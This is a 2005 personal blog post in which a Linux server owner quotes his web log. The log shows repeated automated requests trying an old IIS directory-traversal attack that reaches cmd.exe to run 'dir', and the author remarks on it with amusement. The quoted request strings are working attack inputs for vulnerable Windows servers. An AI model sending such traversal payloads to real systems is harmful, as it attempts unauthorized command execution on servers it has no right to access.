October 15, 2005

Do that to me one more time!

Posted in Uncategorized at 12:00 am by dgcombs

Boy!I sure am glad I’m running this blog on a LINUX machine. I just took a quick peek at my log file and found the following:

[15/Oct/2005:01:24:26 +0000] request from 24.11.148.105 “”GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0″”[15/Oct/2005:01:24:26 +0000] request from 24.11.148.105 “”GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0″”

I suspect someone is trying to break the server (assuming, of course it’s a Windows box). Nice effort – whoever it was hit me about fourty times in a minute or so. Good old boa. It’s still hanging in there. But perhaps I’ll format a couple of files using the ScriptAlias feature to shove back a reply to this kind of request. If you have any delicious ideas, let me know via feedback, won’t you?

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: